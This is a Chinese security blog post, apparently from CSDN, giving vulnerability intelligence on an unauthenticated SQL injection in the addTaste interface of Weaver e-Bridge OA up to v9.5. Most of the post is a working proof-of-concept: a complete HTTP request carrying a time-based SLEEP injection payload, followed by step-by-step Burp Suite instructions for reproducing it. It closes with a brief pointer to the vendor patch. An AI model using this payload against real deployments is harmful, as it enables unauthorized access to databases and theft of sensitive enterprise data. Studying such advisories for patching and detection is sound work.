漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞

微信公众号:不秃头的安全

漏洞详情:

泛微云桥e-Bridge OA是一种基于云计算和移动互联网技术的企业办公自动化(OA)解决方案。它由中国的企业软件开发公司泛微软件开发,旨在帮助企业实现高效的办公管理和协同工作。由于泛微云桥e-Bridge平台addTaste接口存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取数据库权限及数据库的敏感数据。

影响范围

泛微云桥 e-Bridge <= v9.5 20220113

漏洞利用

GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Cookie:EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18;slsession=BmCjG8ZweGWzoSGpQ1QgQg==;EBRIDGE_JSESSIONID=21D2D790531AD7941D060B411FABDC10
Accept-Encoding: gzip
SL-CE-SUID: 25

使用方法:1、打开泛微云桥e-Bridge登录首页,使用BurpSuite拦截请求包
2、将抓到的请求包进行修改,将GET内容修改为POC的GET:/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
3、其他内容不修改,然后放包后即可复现。漏洞修复建议目前官方已发布安全更新,受影响用户可通过官网安装补丁更新。官方下载地址:https://www.weaver.com.cn/subpage/aboutus/news/news-detail.html?id=934

  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不秃头的安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值